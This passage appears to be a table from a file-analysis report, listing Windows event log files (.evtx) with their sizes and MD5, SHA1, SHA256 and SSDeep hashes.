SHA1: f1856d6d4cab701cd9f05873f2d8fc159e7168b4 SHA256: b38eb160998a0e16a675fc07654577192f4cdb5ce9eabfc4385292deb49ef77c SSDeep: 1536:XzbREcEFivP3EhtO6v+a+2gfTubun+xOZ4T792Lpa0baUr8HsU:XhEZY38g4NMrubu+78Lpa0mUr8J |
|
|
| \Logs\Microsoft-Windows-TWinUI%4Operational.evtx | 68.39 KB |
MD5:
7b1b2a5a2954762729716d1a8e90482f
SHA1: 64ae464b095534001092f5e758cfc92abd84a337 SHA256: f5e6c15d053e75ab34861a7d300e3a3ce20ba91e303b9cb1e7b08e0718f7c1b3 SSDeep: 1536:F47BuWEdeciqSW1IgeIoJvpcDb1A5lNmlvpwqEJg/9vZ3OESu9XEB:F47c9dZJSkIgeBJ+JA5HmlvKJhMM |
|
|
| \Logs\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx | 68.39 KB |
MD5:
626528a50e60c70ba9ed3b313ee93eb0
SHA1: d254743bce293ed73af11c5a6415c07167af8a91 SHA256: 2bee15ff5b5e13cdffb4edcc81989b43fcc5cf765483987e86f05b2c6777dbee SSDeep: 1536:9g6P6odS312YCGZQiUkdQ1wVGNSDQ0paTDnM6afpQ:26io+p5Ttd9UBbrD |
|
|
| \Logs\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx | 68.39 KB |
MD5:
c7990c9c80077191505372f960d93717
SHA1: 1a91979c2ff7c72cfa26b4496a9bb14bc3f5f8b6 SHA256: 15086351fc2bded618bb049681b0d706f5fb16a3ea4ed3a5db86405996a1872a SSDeep: 1536:JH+7UoA8ghwAsrUUYkUPpO16p0ebkCgmQretWX1dK4tftd:A7g3hwlrUULN6pHbkCg6t2/K45td |
|
|
| \Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx | 68.39 KB |
MD5:
8cca99cf58da4bc531d35f5305e893a7
SHA1: f734aeaf41307489e07b68bc67b852437293fed4 SHA256: 009cbd85e6fa568687d9ae059c3b571ed338fd7a72585bbe6cb88be94452485c SSDeep: 1536:QAdYiJmToiTaJaK0v0ETSBvzGNfMEkj4Z2lIaf/BIVB:QAd/Jm/ZK0v0ETSvzTrjaJX |
|
|
| \Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx | 68.39 KB |
MD5:
30795dd7de54d07f44dcd67b15a53d37
SHA1: a74937180418e650e4ff0af400d08fc237bdfc07 SHA256: 6a2a586092526a1cf5f21114b3c12ad548e768cc044e88c21f73a684c9909560 SSDeep: 1536:wmkT30dGZRFuKpb89JvhFPrI/9Ig4Ho5pbhO8uhX6g:CzZRFuOb8dFU/9IgUonhO86X6g |
|
|
| \Logs\Microsoft-Windows-TaskScheduler%4Maintenance.evtx | 68.39 KB |
MD5:
f4514442ccbe425198a43629636cbfe5
SHA1: 99c31ba2418b09272f481f4312cb9e12aa9d34c9 SHA256: c7f75b471acd58308742031c4fa7e909e1e37ef6d07d31c31d77c5625e94209e SSDeep: 1536:L33KvjG/8CehDxsnUpEpQYLt+WXIrPy1a8+9jjeOasa4SN:L36vqreh1zqVNYrPwa8eeOasc |
|
|
| \Logs\Microsoft-Windows-Store%4Operational.evtx | 68.39 KB |
MD5:
da50e2ea706b9a0f4ae25d277b448511
SHA1: 9f0b336bfc722e6bca0c8b81c526c5aa60cd0c05 SHA256: cba96cb4bba76f414608356b39f243427bf59289e428c549d5fd6378a82f2fdb SSDeep: 1536:HRWqEkpzYIMKQ/jpiTOnKHbVbzNPc2TVgYK8J:HRWf5TNolNPcMVg0J |
|
|
| \Logs\Microsoft-Windows-SMBServer%4Security.evtx | 68.39 KB |
MD5:
048eebc2c549fbb0c32586206505a33e
SHA1: 7417ab51eb500c783191f2bc0de7e8e50f19f1d6 SHA256: 3ed2e147dbc167ac75e4b2aab4927f3598f294f846e4f71f0e907cb201fba344 SSDeep: 1536:YUu6MJBeDzp7LrN6eHhpJlgTDrUJ9Opx0fITkrmdI9g:Y16ySRXseHh7lI/Ayug7Ii |
|
|
| \Logs\Microsoft-Windows-SMBServer%4Operational.evtx | 68.39 KB |
MD5:
a2c4edbb6f765a068b0659274faaf8ce
SHA1: a2ffebdaeb966f82253063d0bd62b0a3d4234f2b SHA256: 7fba066c5d0fa791c24e52ae870abe1e0e9b8b12455291e6897426e6153a8019 SSDeep: 1536:VErNzuc1HjOAswJ++TCyDOvS556lyuGNfrhJ3eYYPnRp5:VErNzuc1K+HDOaalGNjhJOYch |
|
|
| \Logs\Microsoft-Windows-SMBServer%4Connectivity.evtx | 68.39 KB |
MD5:
cb2d1c16270a67e3386281dd1e1d7919
SHA1: 6fb7b9f8a50002fd3f3916bb8dca5f07dd5127db SHA256: f6c5fe18784aeac4705e81b1c26a1ba6ab524b363e0018d1a237b854f46fcf4b SSDeep: 1536:WMH9le1RFBNR7r1zSq9JcrGBfTFFjQ48ztVwhWk4I+d:lH9oBzScKrGphahVwhXEd |
|
|
| \Logs\Microsoft-Windows-SMBServer%4Audit.evtx | 68.39 KB |
MD5:
f7f9c192da2087f0ef71774a19a3e0e7
SHA1: 001b0795ead5971eb79a43b31c9d70df882fdc50 SHA256: 77aa88d531fc1f4b6077ef23139a69314d8ba4f7a3ecb852647bb0cb78822e9c SSDeep: 1536:fzI+jzJrGwaBx2HR3up4h+kvI/ufNYcLcBJnphKfeJ8X:fzqwixK33hi/uX2ceJ8X |
|
|
| \Logs\Microsoft-Windows-SmbClient%4Security.evtx | 68.39 KB |
MD5:
6b0db43b638817a58d7858fac97a070d
SHA1: 4cab8b0b78addb2f2f4e84c137a21742ba7a4b41 SHA256: 7981497767e01aa5a44ece91beeef339c4e83a40aeb49f72b408cdc12e8a4c2b SSDeep: 1536:0iwMvKxloX8U+uKXhrkufyZiWciSZYrSlfEQmi+4PLYopESo/p/Pjc:ExKH+uKXuumi5iPrSJEQj5jYopzoh/PI |
|
|
| \Logs\Microsoft-Windows-SMBClient%4Operational.evtx | 68.39 KB |
MD5:
cef348ce74af2dbe3fa704cd0ca3d326
SHA1: e8322e875353b47dc6ec301f9bdea92eb84515cf SHA256: 5e43ed9b12ab5b3fe663109e9dfb936ddf033bf60c685379bd5d74e77bda931d SSDeep: 1536:jHgdk2vt6HPlPG8O7EtA8OnckYXn4rfPC5poqC2s5cczqtW5c6ug:jAdk216Hdu8Q6BXJnoJKcpqe |
|
|
| \Logs\Microsoft-Windows-Shell-Core%4Operational.evtx | 68.39 KB |
MD5:
5e25b23461b85e84cfaa1406c145e62d
SHA1: 1d33cd6bacef744fd1a1f5aa9d8d839952993a07 SHA256: cbba1b6801bfd8a265510586ab2117fa166c1c47993f8f5f1af037d5a9b0dc0a SSDeep: 1536:EB9tJTooUySlds8bYWAKoiQq/QZ9Y94Y75yJ0e8R3jmWgsvq:EB9uFlu8YwQJZG7EJ0r5jzq |
|
|
| \Logs\Microsoft-Windows-SettingSync%4Operational.evtx | 68.39 KB |
MD5:
82e332712e87f7ee45c56f000e15f1a4
SHA1: 2cd1ca76691d1b9f2dc0e340dde5427f3a412009 SHA256: b4f6b0bdb9c6793c8ea4824af807202085a23519f5357c1aa828560de09c10ba SSDeep: 1536:mp83+cLkJ0fh4y6t7ZiwlMAnYLwkC4zniSGAO/SXotGZMFYBKQuqeNn1:mSOwO0fWyS7ZiI6Lwk3niSG5/8Z8qeN1 |
|
|
| \Logs\Microsoft-Windows-SettingSync%4Debug.evtx | 1.00 MB |
MD5:
b3d0c9c31787ff9d3744ae2e151b7b90
SHA1: 924e47141129efc8ede0ebff3eea78cef0106f7d SHA256: 59fc3b7cabb00491ca6551746e667d53e0eafbfaa22ae0660a40bbe85cba8dd7 SSDeep: 24576:h5TXL90gB97bLRpxKRQBJiZqI1RJ8ixrLUtSSJ/abBWl:/90gB975pxSWiZqIRjEJ/ic |
|
|
| \Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx | 68.39 KB |
MD5:
e88ede4bdd160bc2f8f17ad14968968d
SHA1: 023da283d1c5c4bb8e9f47da9bd47b9ba3e42bde SHA256: f8f5f5eb18945a007932913289635b3cb65e6e1cbcb520ba8c15837601b40918 SSDeep: 1536:X7rfUFLjTqGE8Xp7mbbSxkb+SAmht4Z5Y1UZT:X7rWOGE8XpQ6SAmh454CT |
|
|
| \Logs\Microsoft-Windows-ReadyBoost%4Operational.evtx | 68.39 KB |
MD5:
86849ae19b298f8e4da0a490a5097032
SHA1: f650c27986b8af891a6cce38297dcbda4b6f4409 SHA256: 4433f9419ab80b817e91c8cc0641814ba8a93b4a86eb030259d2a89ba2bc7101 SSDeep: 1536:3bHhC4FxA1QEiJB+EgXq4IIGZCO6+fA9MyTLp:rhCsA14fHXIr+PyTF |
|
|
| \Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx | 68.39 KB |
MD5:
1b185424dbece6b6109f581b1d400e18
SHA1: 6901918d335f6a99231194c9dcfd70d61c1514b1 SHA256: f435f6f2c77f14ae9194b012acf14258c6eaf3626ec7ff4a9ff1ee9be5a0b46b SSDeep: 1536:YdFQFmjzhAw+kkyYjXiL5ThkWfkpsDU7DrZ1sEiENqIBU98d:Y/Qi+kkyY7iLd3asDU7/LNiEIJ98d |
|
|
| \Logs\Microsoft-Windows-Ntfs%4WHC.evtx | 68.39 KB |
MD5:
55841b1e83d72dc9507e6293c6f0ebc8
SHA1: 1d9d436716423e38b186f4e9d2905eaee8df3e0c SHA256: 27f965d51e62eeeef22bb0c9c3c0fbcbfa22a2d6bf550976f777b93757c8800a SSDeep: 1536:XUnilPQSh2CIjnNP2dAh+O49WZpB3EyB/jknN3QiKny:EynIbodAsO4EZj3EycBGy |
|
|
| \Logs\Microsoft-Windows-Ntfs%4Operational.evtx | 68.39 KB |
MD5:
418a503b59e3269b56fe6114997fce91
SHA1: 73aa16fbee2a1d8586bf9a52ac03133d6ed80beb SHA256: 1f9489bb49ee856e79fcf3c6d5e5f0b7e154296375a782969d00434e2560e41d SSDeep: 1536:5iUcGpOxJtfUMUi3XlNaZL7ypvzECfaBO9SMjpshg:5Syml4FOVhlug |
|
|
| \Logs\Microsoft-Windows-NetworkProfile%4Operational.evtx | 68.39 KB |
MD5:
5cb774c9e3eddb6f501cf454ff7b4fe4
SHA1: 1c513cd0e9403252c677407c938cc1577f2b6c12 SHA256: 50dd3c52069594b4ab72692ca888103b05a5f190251876065cdcdba3239d1276 SSDeep: 1536:L68ReUNlHyb4zz69Vfs7aUY6KwyAF+1nlz7AJqkyZ/S4j7z6Bw:L3eU3DucK+F+N4mYiz4w |
|
|
| \Logs\Microsoft-Windows-MUI%4Admin.evtx | 68.39 KB |
MD5:
09e2b69c128a2e774edf0671a317c948
SHA1: 15f278c2c5cd83fdff808da555216f44e4b27f15 SHA256: bb229cc35a5711400b83d62adb681e5410baea20a12f7b3280e65aa324469de9 SSDeep: 1536:I8Dqp/Lmkl6C+yukjiq+eh9/R85ogRc9zLBZs31F8iKQvv:I8Op9zQYF7fzObH |
|
|
| \Logs\Microsoft-Windows-LiveId%4Operational.evtx | 68.39 KB |
MD5:
4be74f950870f87c20cf9a9e302a658d
SHA1: 2e1d54cccf56a2317965877e6f7d87db75e00b3b SHA256: d10303f11f0e7ae960405d924b09c6286486d88652a6e625b27bd8cfd0d7b0c4 SSDeep: 1536:U1VG0CeyBEZj2tiTZ6xw0mqJvZZbeYMfFrq1ctdWf938B:AVGj/Lwg1z6YMde1YWf0 |
|
|
| \Logs\Microsoft-Windows-Known Folders API Service.evtx | 68.39 KB |
MD5:
474f977b4d6d7b5fbfd14683f55dbd1b
SHA1: 021dc135f69dad1f8998d6ee14b9522a108706e9 SHA256: b8c16cb0f14de4bc7cf1b47c81cedf114a239fe6769e31a2aa2789c3b84e70ac SSDeep: 1536:s8VBlviHHDZQVJB3dx90bbjE9//phm46+n:XBmHWTBmbvEVphm+n |
|
|
| \Logs\Microsoft-Windows-Kernel-WHEA%4Errors.evtx | 68.39 KB |
MD5:
2b3e113e176358112fbb9d54ed2f1a08
SHA1: 62e35a3b0084bcb57979866d04c1fa17b324437a SHA256: 9024dd15db4ac8f15ba2fb48c67425ab80e7f80797d1746d75f4633303303b22 SSDeep: 1536:qtT46I4zbNiAlEwosPoJcMI5OPJ0WJlt/XNYF5Cwom:eRbNiMx7QiMINWJlt/Kom |
|
|
| \Logs\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx | 68.39 KB |
MD5:
d3b4228fbc9c19a40edbe502d3e7f705
SHA1: b3caedff18714d7958d0a0168db72ad94cce573e SHA256: cb44940881a7ac60b50ad3015b42a178bc672f0e886679f32ae91adc8b951985 SSDeep: 1536:LdRRCdHG9yyo25nI1PUzgqrlm9qXG81n3rffVRqRpYkxDImdoQvO:L/Oi35I1skqhVX53rf8YkhImuMO |
|
|
| \Logs\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx | 68.39 KB |
MD5:
9aa495a9ad38bec00e1660eb457069a1
SHA1: d015ca03a747c59c7e69bb6ce1f86e1e88ee78fb SHA256: 013061d1dad53f8f645499fe02af8a92fce50ce0c8dd3010ef6ccab8f6aebee5 SSDeep: 1536:27A+gtvr6ttrbk9bMKhOFqi88VUCQaKv0E+USHH3yNYLRcMXdi3b:DQttrb2XiD2ae+UUJnt0b |
|
|
| \Logs\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx | 68.39 KB |
MD5:
e4c7ea7e292a1a83591af30791ffe4dd
SHA1: c637d512c401a744d35a2a795487d55c40595149 SHA256: 6fe9fc258b69d6743237f2a78ffe71450b7be5255706074fcc48b036ed935e6f SSDeep: 1536:jWBDvRfn0yt0lGYg239r/sVgM3UDaRaa4sLzNPFQSq5yfxF54vXcE5uFE6Bc:qBD1nxWlrgAmVHUuRaaTHNSSCUD4vXPV |
|
|
| \Logs\Microsoft-Windows-Kernel-PnP%4Configuration.evtx | 1.00 MB |
MD5:
62aa00136821980928aa95aba869c7fa
SHA1: 51f087763ed4436317b317865c8ddcfd8cd26b7b SHA256: 6e55fbfa7e31641772629801ffe3aa65f1e196ca347187609b1f729737db5533 SSDeep: 24576:cDDQu9w4c/rGMHSjsXvQfHRBE/7gDKKgwCLa65y:+Dt9K/DHSQXvu2/aKKt |
|
|
| \Logs\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx | 68.39 KB |
MD5:
9b02046f86ec3ef6f545c2af138a1a08
SHA1: 483dba290c4e3813afd234110ce259f1a6ead6d9 SHA256: 4c096e51631ae6a14468fb5750f6b84c87ae5691d1adb2163056700b675cc6f4 SSDeep: 1536:CcBmc7P7UR/b22KY+XqTWLi5xNWTg8ug/N7MZr839EJEOWR:3HvH2ng0W4D9gV7MZrnJEXR |
|
|
| \Logs\Microsoft-Windows-Kernel-Boot%4Operational.evtx | 68.39 KB |
MD5:
033c1012b0eae3f093a2cc8efdfbdbf4
SHA1: 2fa30b0717e5baef12901c6d679e1ae94bbf6be6 SHA256: 5c65fc96da2e859ef7c7e82dfabb3e39deb982adf00b1d90b7ae8c9b95c5317e SSDeep: 1536:5+LYx78EUZ97MlrPxWDMMkfOkILuEiqZ/OyHtmSL:5+LYx7nUZNMlrPxkNkxxa/OyN3 |
|
|
| \Logs\Microsoft-Windows-International%4Operational.evtx | 68.39 KB |
MD5:
ee89597b33323f529707a014f7515199
SHA1: 417c3f70629d4987cf41e3ea1ba8200d5fb7ebea SHA256: f09a6e755908af27be32d42b1ad2ad66a47cb1d9ca6684febafaedf9e1ce303a SSDeep: 1536:MAUmrIArwHWVDPrHxK3UQ8uH+LJGiG3KEUoa0kjcLlr4:MAUm8O9xK3ZDIMOGLO |
|
|
| \Logs\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx | 68.39 KB |
MD5:
18bb8eb911cef2e13119a7b0e3aab5e8
SHA1: 90dcf858339c15c27cade684ca7791dccfc02f6b SHA256: ba2e48dff1847cea5d8367a727c5ddadd96363351b4228b86e5fd7fc14c4743c SSDeep: 1536:1Om5HF1CTo/ot8yvCL+9ohW3C++DyJnMoCLFmLZgLMH9PwrDk:1OeZ/A8yvCa9oEt+DyJ/bLZ+u9P |
|
|
| \Logs\Microsoft-Windows-HotspotAuth%4Operational.evtx | 68.39 KB |
MD5:
a136168c9b3c1748f2e123b9e6c7819a
SHA1: a79c0c49bae40d1904fd5f1889dda30e358e0f42 SHA256: c6cb3d7dcb4e8e0508301c04d31e5411c8a63dec12e580bf86d899a7565f74c6 SSDeep: 1536:sd7rBI9Qpcpi80QYYW5iwtBcEejfUuXujueL6Eunl:OFIiipipODwfcVjfUNjuY6EO |
|
|
| \Logs\Microsoft-Windows-GroupPolicy%4Operational.evtx | 68.39 KB |
MD5:
70ad9bf59e23282da9374a6b42191d22
SHA1: 56538e5600b5c4cc677855548f63b4026fca8128 SHA256: 19870cb313c487f26cb99905b8503ced8184fe9bf5ce7bbf0c6b7acef72dfb8c SSDeep: 1536:6JrRWi+RZyyH1nDiTNr8rkxo/vTXfTMM1RNGzNxr2dE9HVgQ:kW/RZyUDCr8rkWTXfPFFdE91b |
|
|
| \Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx | 68.39 KB |
MD5:
b9325e1a165ba6e60fef73a8c2b2d5cb
SHA1: d7d7f24f0de4ab1e10a996b11d36fc17be67e113 SHA256: 990a003cb494ef566f150242eee2545fa3bdc3af9af9e6cb4771fc925f4f0b79 SSDeep: 1536:esU8WDj4ZPY0NCH16yFt699WhXDLXlR5SlNL4OpcpnPOyR2GEE:/ULjD0NfyFF55SkBPB3F |
|
|
| \Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx | 68.39 KB |
MD5:
e09ec219b67d8bcf0e2b484902f3e54a
SHA1: 70d9ea2f6e32d987ba2a0fc8551f5a90dba7b56d SHA256: d0d775d661a5bd49990e4b6e8e0f45e57f6db2d3c1ebdd9ddb4d524ed9924ac9 SSDeep: 1536:JjNnjzVNxloa9XmTXFWPBfVrJqPxs2hQbZZ8Z+gouUorgxI:JjNnj9R92XFAlVKO2hQbZZ6ouUorYI |
|
|
| \Logs\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx | 68.39 KB |
MD5:
2865e0e3373c6280126309c78fc96394
SHA1: 1ac62a908f362564e5402cf7ea86f9bc4ad44d0e SHA256: 2b2be2ef1d7a5c1b1705aec2b853337244429334a6f108aec2427b3a68b7e300 SSDeep: 1536:mHz9ZHYHTiaE2ULubirqzLRxXF/MRLgKiKGRn77VfzLINsA:+z9Z4H8uLzL1/MRMyGR77Vfzg |
|
|
| \Logs\Microsoft-Windows-Dhcp-Client%4Admin.evtx | 68.39 KB |
MD5:
369476683b8cc624a5fb43eed3cc6d29
SHA1: f9e05a7071dbd7e44fc324878331eac47ece8f73 SHA256: e6d68f15070c54d8a84e2577816dff41d882f53ac81c481982d06457008dbbeb SSDeep: 1536:WCXBdZ8yLWIPs6jhKXaNWfN84ScY1OEMq8gfD:WgBdZ8yLWAUF5SfO5UD |
|
|
| \Logs\Microsoft-Windows-DeviceSetupManager%4Operational.evtx | 68.39 KB |
MD5:
151c229029507e070b41bafa842ac99a
SHA1: 9a868df1d859c9307e088089ac3d06abb8b9318d SHA256: a101ac202ab2e8fa9fa2405e122f7079305fc1e632f70ff7403617885bc51c9c SSDeep: 1536:YO0G5haFJhOclPONWxxdktyEPz990CLIoiTvdgW/qf9QHKxm:YOL632HvPY9DdgtfaHim |
|
|
| \Logs\Microsoft-Windows-DeviceSetupManager%4Admin.evtx | 68.39 KB |
MD5:
33bd6512e196852f44a4bd94befe1d60
SHA1: 46d47edf9314c7a4e12b1f35175a7fc521346e0e SHA256: 51202798e533c63c2a4f148f42fb41719251d66ddf7587c2c0193a8cfa531e07 SSDeep: 1536:9d1Zqr0XNKms6PoO+Mm+QXd33u3L3Xg+MKSR8r:9x0PpO+Mfke3LMKxr |
|
|
| \Logs\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx | 1.00 MB |
MD5:
fa5b02203a8acdd02ef6e95cc81ed68c
SHA1: c6c1a1694ed318b861e0faadc673db6c3805d48f SHA256: cb73843eee018e025bc83a0bd9f616c6c29626b6a387cda06852bc355fe301c6 SSDeep: 24576:KgOnoaXgoO/u6fCl/d9qfUbVf73oNkG1Hud1nFBJgK1ZT4:rKoaXfOG5l/zVfjoNkwGFvgKQ |
|
|
| \Logs\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx | 68.39 KB |
MD5:
882f4d1ccc5d60e29f93ba9b493ae461
SHA1: 261d872db930e8e3d267a0303f11e2138ec7fe10 SHA256: 6c32ea02b45bf7f69f6d00a5f8fa639aaad40a15ee85a1122a85723d67b9b575 SSDeep: 1536:TnvlIh+XebLKROa2Isu6A8cRxpyb+Io3SJoaieW4MYCVNymGkL:TvOwXXNVySIo3SJoMGl6kL |
|
|
| \Logs\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx | 68.39 KB |
MD5:
af29f2156fc8c52099741fd9a6579679
SHA1: 1b5f0030c6334f998db7f4f79e82d897876ba1be SHA256: c4ce2c18bf7cc88cc375f75d9bef3881b0b2e7ed4cd1b755b3a40f531f2d1652 SSDeep: 768:46oDAos9ycQQ0YN7T1zzBwjaQu0pYucdkvobuoLUZxY9dECEECab7JqL8tpsUfsb:SAos9yLQN/l2e+pszBUZxa70o9vWfhbh |
|
|
| \Logs\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx | 68.39 KB |
MD5:
b5b1dc87c143cce5367061442168b46b
SHA1: 47d32ea246c6148f684db424d37ca4dbdcd8ca36 SHA256: ad69edaaee461ece4ea4611072ecbe0068de21064411aa4834a5758f4afcfb0f SSDeep: 1536:kwdPeUbM28AT34Anq6A26FpwLqwEHklHuEfahjq1LtS:TFe6T34L26FZrFhu1BS |
|
|
| \Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx | 68.39 KB |
MD5:
ba2b9b1d6e37b158f4c9dabd2f0408fd
SHA1: 2e59685a5499f5dec2943530cdc02bb3272f0942 SHA256: 2fe1d8d1f684fa57ca52f10a18741aaa9b3670034283e3c3b756a0b08b80c96f SSDeep: 1536:6w/8NapZJOPSwfetga/plg6/bwzQTSTYexngaJyEJa+AK2oj:OapPOPv6czISsexngGyD+Aboj |
|
|
| \Logs\Microsoft-Windows-Bits-Client%4Operational.evtx | 68.39 KB |
MD5:
62dbaa9f92799b39d606dcc9c7ecc91c
SHA1: 07c79a5f880567b34f82e95f1145f23604c83bab SHA256: 907e8667ce7cd8c5e2502202f97b880462c2b429417dd8d8f3640792e64d488a SSDeep: 1536:isPNQTZ1IgtaazktiF+ng66xXHaxL9l0d/IGt4Cp8/5ZCDRltpcvNU4:zPNsZJta1tiwg6w3aeQGt4H5ZCfQvNU4 |
|
|
| \Logs\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx | 68.39 KB |
MD5:
6c1609db6d1f15a282b862a92921ca31
SHA1: dadc7d2f87d5724f46ccb3ada578f081bab03583 SHA256: 7128d31810ed5aff0058a70a48c5ede0082c12c1e15a0958bfbcdf1442ef80da SSDeep: 1536:exL0+vmsgbesbD5kOky6658sHmjN1QeRyW+p5kHvhQgEOBYIecnAKbCka:a0lN6mSOn6658sKdyW+fkHvhQqY8XXa |
|
|
| \Logs\Microsoft-Windows-AppxPackaging%4Operational.evtx | 68.39 KB |
MD5:
fcdaa30670cda897377e61ca645887e3
SHA1: 7c98de0fa420bf7bf9f2def8630bb3df2ce5de9e SHA256: 93147d6617808cbd349bac64b4af55185cee1483806bfc999a04ca114b15e583 SSDeep: 1536:ejpMYbxBxV2UOQz5VKd8SYKVlmvOyn3zQHmuoTaG32Nm+DM:oLcUbOpXnMDQGQS2NmwM |
|
|
| \Logs\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx | 68.39 KB |
MD5:
f2cc5bc4984d58798777b258abd445ec
SHA1: a405ffebefa0f6efc1dc502b5300c15a6be9728b SHA256: 3dc1140e87d3e0fe4810094840e8d2fbd459264ca02498571ba12ac874bae561 SSDeep: 1536:mSuBxC/zrbcdMZCGvUDDedi3/jODMUSHZLeJj:ie+6sDfbLfHZCJj |
|
|
| \Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx | 2.07 MB |
MD5:
f882819dfa73579b28a2f40ac2d9c6f5
SHA1: 7f235871e1f67d2ad80ae7751a8e4a9cd5fd3086 SHA256: 923cfc7423dc7807f37a63da5243abc8e326c51051c4dfd5f2a1f13f274435cc SSDeep: 49152:pJwqrTa0PEM4wOv5ET4IfxyF3lljs9GT/KtPVv6XX:3wSnPEHBETfyF3vsxZVv6n |
|
|
| \Logs\Microsoft-Windows-AppReadiness%4Admin.evtx | 68.39 KB |
MD5:
4027a025067730d352c7ac464bc770f1
SHA1: 0629ffdc7925e0dceb1beaefe4b14aabae00b6ab SHA256: 210dd3e2dc0aa730b57d85aa65744ffbaac6bdfd2fb7267308a65ce5b03e92b4 SSDeep: 1536:cmIcGx9X9YzCNtIA9MF1reKRy+YYU3SFh4YHMCeaMr:Z9z2tIv1eKR0YU3J6Ly |
|
|
| \Logs\Microsoft-Windows-AppModel-Runtime%4Admin.evtx | 68.39 KB |
MD5:
a927d80344df2366419f7e9e5998fc03
SHA1: 8547c7ed1d0079e5a2dd03946a2cbcdb2d737b47 SHA256: 887a87729fa3b08b9df78a140fdd741f6567e0a8d40e6f5d9d8e3da3b88a1f3f SSDeep: 1536:Gfr1oBndOOnUUr9e/A/ygeB/KoVXMy6DhF16ckU6q9hvWx:MeBndcUyA/cB/J8y6Dh36csqzW |
|
|
| \Logs\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx | 68.39 KB |
MD5:
676df6ccf66829c1becbfe50e1d040f1
SHA1: 3daf8db3d038faeb706585ce699a8659b4bcc380 SHA256: 52fb24d19f240a0b7f67aecb755234368949c7026fb531c685d138f7570558fd SSDeep: 1536:VKYlGGYGymWewibuy5F+QlOBhxOW2wyWBGfv:7aGHWewibuwF+QloDBbBM |
|
|
| \Logs\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx | 68.39 KB |
MD5:
eea6cea60a350d118368514590bb3011
SHA1: 7a62b767a8376dba1c44b25d827b1052f1483fd2 SHA256: 984ffe17c0a76b3be3a830ffea878d2e2bb2a5a839a767b174637dfc5aacd0da SSDeep: 1536:FoVBPxpGQrNbyvLz23WFy8a58B0Ul4mKlM9nYq:APxpGsRv3WFM5u0ZBMBYq |
|
|
| \Logs\Microsoft-Windows-AppLocker%4MSI and Script.evtx | 68.39 KB |
MD5:
122f731be76043e84f799b3151cf1b01
SHA1: 8e533d81fe83ffcc56afe1314064e5673e52e794 SHA256: 884dc344231e13ef89fd64a1ec9fe2104ccc39066963aeed1e66fbb07f05fd62 SSDeep: 1536:7JO+1DZRZOGSmDnZD1C8QAl8UMx08EC0QFq0PyGKvX:7I+17om7l8rx0820quSX |
|
|
| \Logs\Microsoft-Windows-AppLocker%4EXE and DLL.evtx | 68.39 KB |
MD5:
a92547abaede100ffe68ec20496d63d6
SHA1: d8c3df9352a2b76e54ab6ecb5e46ffe3e57b6b60 SHA256: f28e685a1fa020cb6c15330dc174fd5739ae634f8354dc63515260bb1b223096 SSDeep: 1536:xLlXhR48YHW/BJ24jd0RIsrzj4WuOjl+QiIukGC3R6rlSD9kHMqR:Bre8YHki4j+DrzUWnjtiWGC3xkHv |
|
|
| \Logs\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx | 1.00 MB |
MD5:
485a6b4d4eef4db930d1bae199096e92
SHA1: dae6876f5592b73abfdc0fb7393599a2d94a2c4a SHA256: 141616c572d64e0e8c470628561c0650af28023570bcfbef60fd4c0701e5a04e SSDeep: 24576:XsnBZ0gSi3rkkruzGsOcBymTrMlXGUfBnpgVlylSt8mmcU1U0:8VdrkkSrVyqIl2Upxdc6f |
|
|
| \Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx | 68.39 KB |
MD5:
cee90ae4d8c1c4c4bf7bcca68bf1c140
SHA1: bbc50a62a68dec0665ccfd010f5293e8dae72c2d SHA256: f725a4b1fa437ff2c5f6673a57478de3e4b1b60fe9a2993219e187506d6845e9 SSDeep: 1536:afkQMwJq1dH4SFwtrR483PjaWNW3wvU+sMquTbPZpQ:AkwgfWR/GWNSoUfBc7zQ |
|
|
| \Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx | 68.39 KB |
MD5:
22c1c8232563a399b853819b406c0056
SHA1: 8d8ef2bc8e9fc4d89d425001661c6ad0012d4c52 SHA256: b3e64c5417335d0b9070440d8516e1d83cddfe2b9e6f5fc87a11008df425ee9b SSDeep: 1536:0X+0DbQOtUqQMEKRgWx3tVom2szANjKZX1HZsqAztIA3lsLswt:0u0PQk6MEWgtmrWKSNRIAaswt |
|
|
| \Logs\Key Management Service.evtx | 68.39 KB |
MD5:
479852cafaa1ce7dba2fc7a28618ad67
SHA1: ca2e1b98a1ff5cb7ae3223b3050ae4b6b746f09c SHA256: e700b0eaa47c26ea86c7bc6bfb4ef1c2c4253ffa51a7fbb96f82c882ed60846f SSDeep: 1536:aCDOUvkhXvxzYeziC3Ouxc/O9FVm9Lmlt79IG8NcanRBx:amuJzYezig9xj9zyFNl |
|
|
| \Logs\Internet Explorer.evtx | 68.39 KB |
MD5:
53f9ee3f813fec34531a5c85bc75415f
SHA1: 4b787abd51c84b333c60763e8c3d5252b2d98c9a SHA256: affebb6eb7929e6cf2eacde38173c0bfd4aedd2be5c32dffd4eed51d3fce218e SSDeep: 1536:edSpv6xNzDcKbWA6fQ2+YCKPiZXL4V/5g0cIXw2Ag3I:GSvMNzF+Q2+Y1ELK4IXqg3I |
|
|
